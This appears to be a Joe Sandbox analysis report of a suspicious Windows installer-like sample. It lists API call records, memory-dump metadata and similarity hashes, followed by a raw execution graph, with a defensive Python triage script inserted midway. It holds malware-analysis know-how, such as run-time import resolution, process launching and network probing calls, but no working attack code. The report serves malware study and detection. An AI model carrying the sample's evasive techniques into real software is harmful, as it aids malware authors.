• API ID: CapsCreateDeviceFontIndirectVersionwsprintf
• String ID:
• API String ID: 1599320355-0
• Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
• Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
• Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
• Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
APIs
  • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
• lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
• lstrcmpW.KERNEL32(?,Version ), ref: 00407276
• lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
Similarity
• API ID: lstrcpyn$CreateFilelstrcmp
• String ID: Version
• API String ID: 512980652-315105994
• Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
• Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
• Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
• Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
APIs
• DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
• GetTickCount.KERNEL32 ref: 00403303
• CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
• ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
Memory Dump Source
• Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
Similarity
• API ID: Window$CountCreateDestroyDialogParamShowTick
• String ID:
• API String ID: 2102729457-0
• Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
• Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
• Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                                    • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                    • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                                                                                                                    • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                                                                                                                      • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                                    • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                    • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                                    • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                                    • String ID: !N~
                                                                                                                                                                                                                                                                                    • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                                    • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                    • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
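The per-function records above (the GlobalAlloc / WideCharToMultiByte / GetProcAddress / GlobalFree resolver, the window-message helper, the INI read) and the CreateProcessW launcher that follows are the raw material a triage script consumes. The Python below is an added example, not Joe Sandbox code: it parses records in this layout, recomputes the "API ID" with a rule inferred from the visible records (split CamelCase, drop a few filler words, most repeated word becomes the "$" prefix, remaining words sorted; this rule is an assumption, not documented Joe Sandbox behaviour), and flags the resolver function. The flag rests on one fact: GetProcAddress takes an ANSI name only, so a Unicode binary that builds the export name at run time has to narrow it with WideCharToMultiByte first. The sample input is constructed from the four records on this page.

```python
"""Parse Joe Sandbox per-function records into structured data and flag
run-time import resolution by name. Added example; not Joe Sandbox code."""
import re
from collections import Counter

# Constructed sample: four records from this report, trimmed to the fields used.
SAMPLE = """\
APIs
• GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
• GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
• GlobalFree.KERNEL32(00000000), ref: 004063CA
Similarity
• API ID: Global$AddressAllocByteCharFreeMultiProcWide
• Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
APIs
• IsWindowVisible.USER32(?), ref: 0040492E
• CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
  • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
Strings
Similarity
• API ID: Window$CallMessageProcSendVisible
APIs
• GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
• lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
Similarity
• API ID: PrivateProfileStringlstrcmp
APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
• CloseHandle.KERNEL32(?), ref: 00405C9D
Strings
• Error launching installer, xrefs: 00405C74
Similarity
• API ID: CloseCreateHandleProcess
"""

HEADERS = {"APIs", "Strings", "Similarity", "Memory Dump Source", "Joe Sandbox IDA Plugin"}
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-F]+)$")
STR_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<ref>[0-9A-F]+)$")
KV_RE = re.compile(r"^(?P<key>[^:]+): ?(?P<val>.*)$")


def parse_records(text):
    """One record per 'APIs' header; unknown sections (memory dump metadata) are skipped."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()
        if not line:
            continue
        if line in HEADERS:
            if line == "APIs":
                rec = {"apis": [], "strings": [], "similarity": {}}
                records.append(rec)
            section = line
            continue
        if rec is None:
            continue
        if section == "APIs" and (m := API_RE.match(line)):
            rec["apis"].append({"name": m["name"], "module": m["mod"], "ref": m["ref"],
                                "args": m["args"].split(","), "subcall": m["sub"]})
        elif section == "Strings" and (m := STR_RE.match(line)):
            rec["strings"].append({"text": m["text"], "ref": m["ref"]})
        elif section == "Similarity" and (m := KV_RE.match(line)):
            rec["similarity"][m["key"]] = m["val"]
    return records


# Filler words dropped from API IDs; inferred from this page's records (assumption).
FILLER = {"Get", "Is", "To", "W"}
WORD_RE = re.compile(r"[A-Z][a-z0-9]*|[a-z0-9]+")


def derive_api_id(api_names):
    """Recompute the report's 'API ID' from the API names (inferred rule, see above)."""
    counts = Counter(w for n in api_names for w in WORD_RE.findall(n) if w not in FILLER)
    if not counts:
        return ""
    top, n = counts.most_common(1)[0]
    if n > 1:  # a repeated word becomes the '$' prefix, everything else is sorted
        return top + "$" + "".join(sorted(w for w in counts if w != top))
    return "".join(sorted(counts))


def resolves_imports_by_name(rec):
    """True when a wide string is narrowed and then handed to GetProcAddress
    (ANSI-only API), i.e. the function looks up an export by a name it built."""
    names = [a["name"] for a in rec["apis"]]
    if "GetProcAddress" not in names:
        return False
    return "WideCharToMultiByte" in names[: names.index("GetProcAddress")]


def summarize(text):
    """Per record: reported API ID, recomputed API ID, resolver flag."""
    return [(r["similarity"].get("API ID", ""),
             derive_api_id([a["name"] for a in r["apis"]]),
             resolves_imports_by_name(r)) for r in parse_records(text)]


if __name__ == "__main__":
    for reported, derived, flag in summarize(SAMPLE):
        print(f"{reported:45} derived={derived == reported}  resolver={flag}")
```

Running it over a full report rather than the sample is a matter of feeding the saved page text to `parse_records`; the recomputed API ID is only a cross-check against the report's own field, and any mismatch on other reports means the inferred rule is incomplete, not that the report is wrong.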
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • Error launching installer, xrefs: 00405C74
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
Similarity
• API ID: CloseCreateHandleProcess
• String ID: Error launching installer
• API String ID: 3712363035-66219284
APIs
• lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
• wvsprintfW.USER32(00000000,?,?), ref: 004062F3
  • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
Similarity
• API ID: CloseHandlelstrlenwvsprintf
• String ID: RMDir: RemoveDirectory invalid input("")
• API String ID: 3509786178-2769509956
APIs
• lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
• lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
• CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
• lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
Memory Dump Source
• Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
Similarity
• API ID: lstrlen$CharNextlstrcmpi
• String ID:
• API String ID: 190613189-0

Execution Graph

Execution Coverage: 3.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 2.9%
Total number of Nodes: 2000
Total number of Limit Nodes: 50
execution_graph
102319->102365 102389 b660e6 102320->102389 102388 b685db 207 API calls 2 library calls 102321->102388 102383 b53fe1 81 API calls __wsopen_s 102322->102383 102325->102326 102381 b53fe1 81 API calls __wsopen_s 102325->102381 102326->102272 102327->102365 102387 b53fe1 81 API calls __wsopen_s 102328->102387 102329 b36dd9 102337 b36e0f 102329->102337 102488 b681ce 65 API calls 102329->102488 102382 b53fe1 81 API calls __wsopen_s 102331->102382 102335 b36c81 102461 b51ad8 8 API calls 102335->102461 102490 aeb4c8 8 API calls 102337->102490 102338 b36db7 102464 ae8ec0 102338->102464 102341 aebed9 8 API calls 102341->102365 102343 b36ded 102345 ae8ec0 52 API calls 102343->102345 102344 b36c08 102396 b5148b 102344->102396 102361 b36df5 _wcslen 102345->102361 102348->102325 102380 af1ca0 8 API calls 102348->102380 102350 b36c93 102462 aebd07 8 API calls 102350->102462 102351 b3691d messages 102351->102322 102360 af1b62 messages 102351->102360 102363 af1a23 messages 102351->102363 102353 af1b55 102353->102325 102353->102360 102355 b36dbf _wcslen 102355->102329 102487 aeb4c8 8 API calls 102355->102487 102357 b36c9c 102364 b5148b 8 API calls 102357->102364 102360->102341 102360->102363 102360->102365 102361->102337 102489 aeb4c8 8 API calls 102361->102489 102363->102272 102364->102365 102365->102329 102365->102363 102463 b6808f 53 API calls __wsopen_s 102365->102463 102373 af1e6d messages 102366->102373 102368 af2512 102372 af1ff7 messages 102368->102372 103290 afbe08 39 API calls 102368->103290 102370 b37837 102370->102372 103289 b0d2d5 39 API calls 102370->103289 102372->102272 102373->102368 102373->102370 102373->102372 102375 b3766b 102373->102375 103288 afe322 8 API calls messages 102373->103288 103287 b0d2d5 39 API calls 102375->103287 102376->102276 102377->102271 102378->102271 102379->102271 102380->102353 102381->102363 102382->102351 102383->102365 102384->102360 102385->102307 102386->102365 102387->102363 102388->102365 102390 b36bed 102389->102390 102391 b66101 
102389->102391 102390->102335 102390->102344 102491 b0017b 102391->102491 102394 b66123 102394->102390 102500 b0014b 102394->102500 102509 b51400 8 API calls 102394->102509 102397 b51499 102396->102397 102399 b36c32 102396->102399 102398 b0014b 8 API calls 102397->102398 102397->102399 102398->102399 102400 af2b20 102399->102400 102401 af2b61 102400->102401 102402 af2b86 102401->102402 102403 af2fc0 102401->102403 102404 b37bd8 102402->102404 102405 af2ba0 102402->102405 102731 b005b2 5 API calls __Init_thread_wait 102403->102731 102694 b67af9 102404->102694 102516 af3160 102405->102516 102409 af2fca 102412 af300b 102409->102412 102732 aeb329 102409->102732 102411 b37be4 102411->102365 102416 b37bed 102412->102416 102418 af303c 102412->102418 102413 af3160 9 API calls 102415 af2bc6 102413->102415 102415->102412 102417 af2bfc 102415->102417 102742 b53fe1 81 API calls __wsopen_s 102416->102742 102417->102416 102431 af2c18 __fread_nolock 102417->102431 102739 aeb4c8 8 API calls 102418->102739 102421 af3049 102740 afe6e8 207 API calls 102421->102740 102422 af2fe4 102738 b00568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102422->102738 102424 b37c15 102743 b53fe1 81 API calls __wsopen_s 102424->102743 102427 af2d4c 102429 af3160 9 API calls 102427->102429 102428 b37c78 102745 b661a2 53 API calls _wcslen 102428->102745 102432 af2d59 102429->102432 102431->102421 102431->102424 102433 b0014b 8 API calls 102431->102433 102435 b0017b 8 API calls 102431->102435 102440 af0340 207 API calls 102431->102440 102442 af2d3f 102431->102442 102443 b37c59 102431->102443 102449 af2dd7 messages 102431->102449 102438 af3160 9 API calls 102432->102438 102432->102449 102433->102431 102434 af3082 102741 affe39 8 API calls 102434->102741 102435->102431 102437 af2f2d 102437->102365 102447 af2d73 102438->102447 102440->102431 102441 af2e8b messages 102441->102437 102730 afe322 8 API calls messages 102441->102730 102442->102427 102442->102428 102744 b53fe1 81 API calls 
__wsopen_s 102443->102744 102444 af3160 9 API calls 102444->102449 102448 aebed9 8 API calls 102447->102448 102447->102449 102448->102449 102449->102434 102449->102441 102449->102444 102526 b60fb8 102449->102526 102551 b5f94a 102449->102551 102560 b6a9ac 102449->102560 102568 b69fe8 102449->102568 102571 afac3e 102449->102571 102590 b6ad47 102449->102590 102595 ae8bda 102449->102595 102670 b6a5b2 102449->102670 102676 b5664c 102449->102676 102683 b6a6aa 102449->102683 102691 b69ffc 102449->102691 102746 b53fe1 81 API calls __wsopen_s 102449->102746 102461->102350 102462->102357 102463->102338 102465 ae8ed5 102464->102465 102466 ae8ed2 102464->102466 102467 ae8edd 102465->102467 102468 ae8f0b 102465->102468 102466->102355 103283 b05536 26 API calls 102467->103283 102470 b26b1f 102468->102470 102471 ae8f1d 102468->102471 102478 b26a38 102468->102478 103286 b054f3 26 API calls 102470->103286 103284 affe6f 51 API calls 102471->103284 102472 ae8eed 102477 b0014b 8 API calls 102472->102477 102475 b26b37 102475->102475 102479 ae8ef7 102477->102479 102481 b0017b 8 API calls 102478->102481 102486 b26ab1 102478->102486 102480 aeb329 8 API calls 102479->102480 102480->102466 102483 b26a81 102481->102483 102482 b0014b 8 API calls 102484 b26aa8 102482->102484 102483->102482 102485 aeb329 8 API calls 102484->102485 102485->102486 103285 affe6f 51 API calls 102486->103285 102487->102329 102488->102343 102489->102337 102490->102363 102492 b0014b ___std_exception_copy 102491->102492 102493 b0016a 102492->102493 102496 b0016c 102492->102496 102510 b0521d 7 API calls 2 library calls 102492->102510 102493->102394 102495 b009dd 102512 b03614 RaiseException 102495->102512 102496->102495 102511 b03614 RaiseException 102496->102511 102498 b009fa 102498->102394 102501 b00150 ___std_exception_copy 102500->102501 102502 b0016a 102501->102502 102504 b0016c 102501->102504 102513 b0521d 7 API calls 2 library calls 102501->102513 102502->102394 102505 b009dd 102504->102505 102514 b03614 
RaiseException 102504->102514 102515 b03614 RaiseException 102505->102515 102507 b009fa 102507->102394 102509->102394 102510->102492 102511->102495 102512->102498 102513->102501 102514->102505 102515->102507 102517 af31a1 102516->102517 102524 af317d 102516->102524 102747 b005b2 5 API calls __Init_thread_wait 102517->102747 102518 af2bb0 102518->102413 102520 af31ab 102520->102524 102748 b00568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102520->102748 102522 af9f47 102522->102518 102750 b00568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102522->102750 102524->102518 102749 b005b2 5 API calls __Init_thread_wait 102524->102749 102527 b60fe1 102526->102527 102528 b6100f WSAStartup 102527->102528 102764 aec98d 102527->102764 102529 b61054 102528->102529 102550 b61023 messages 102528->102550 102751 afc1f6 102529->102751 102532 b60ffc 102532->102528 102535 aec98d 39 API calls 102532->102535 102534 ae8ec0 52 API calls 102536 b61069 102534->102536 102537 b6100b 102535->102537 102756 aff9d4 WideCharToMultiByte 102536->102756 102537->102528 102539 b61075 inet_addr gethostbyname 102540 b61093 IcmpCreateFile 102539->102540 102539->102550 102541 b610d3 102540->102541 102540->102550 102542 b0017b 8 API calls 102541->102542 102543 b610ec 102542->102543 102769 ae423c 102543->102769 102546 b61102 IcmpSendEcho 102549 b6114c 102546->102549 102547 b6112b IcmpSendEcho 102547->102549 102548 b61212 IcmpCloseHandle WSACleanup 102548->102550 102549->102548 102550->102449 102552 b0017b 8 API calls 102551->102552 102553 b5f95b 102552->102553 102554 ae423c 8 API calls 102553->102554 102555 b5f965 102554->102555 102556 ae8ec0 52 API calls 102555->102556 102557 b5f97c GetEnvironmentVariableW 102556->102557 102775 b5160f 8 API calls 102557->102775 102559 b5f999 messages 102559->102449 102561 b6aa08 102560->102561 102567 b6a9c8 102560->102567 102562 b6aa26 102561->102562 102563 aec98d 39 API calls 102561->102563 102564 aec98d 39 API calls 102562->102564 102565 
b6aa8e 102562->102565 102562->102567 102563->102562 102564->102565 102776 b50372 102565->102776 102567->102449 102847 b689b6 102568->102847 102570 b69ff8 102570->102449 102572 ae8ec0 52 API calls 102571->102572 102573 afac68 102572->102573 102574 afbc58 8 API calls 102573->102574 102575 afac7f 102574->102575 102576 aec98d 39 API calls 102575->102576 102586 afb09b _wcslen 102575->102586 102576->102586 102577 b04d98 _strftime 40 API calls 102577->102586 102578 afbbbe 43 API calls 102578->102586 102580 ae6c03 8 API calls 102580->102586 102583 afb1fb 102583->102449 102584 aec98d 39 API calls 102584->102586 102585 ae8ec0 52 API calls 102585->102586 102586->102577 102586->102578 102586->102580 102586->102583 102586->102584 102586->102585 102988 ae396b 102586->102988 102998 ae3907 102586->102998 103002 ae7ad5 102586->103002 103007 aead40 8 API calls __fread_nolock 102586->103007 103008 ae7b1a 8 API calls 102586->103008 103009 ae8577 102586->103009 102591 ae8ec0 52 API calls 102590->102591 102592 b6ad63 102591->102592 103103 b4dd87 CreateToolhelp32Snapshot Process32FirstW 102592->103103 102594 b6ad72 102594->102449 102596 ae8ec0 52 API calls 102595->102596 102597 ae8bf9 102596->102597 102598 ae8ec0 52 API calls 102597->102598 102599 ae8c0e 102598->102599 102600 ae8ec0 52 API calls 102599->102600 102601 ae8c21 102600->102601 102602 ae8ec0 52 API calls 102601->102602 102603 ae8c37 102602->102603 102604 ae7ad5 8 API calls 102603->102604 102605 ae8c4b 102604->102605 102606 b26767 102605->102606 102607 aec98d 39 API calls 102605->102607 102609 ae7e12 8 API calls 102606->102609 102608 ae8c72 102607->102608 102608->102606 102635 ae8c98 try_get_first_available_module 102608->102635 102610 b26786 102609->102610 102611 ae8470 8 API calls 102610->102611 102612 b26798 102611->102612 102617 ae8a60 8 API calls 102612->102617 102644 b267bd 102612->102644 102613 ae7e12 8 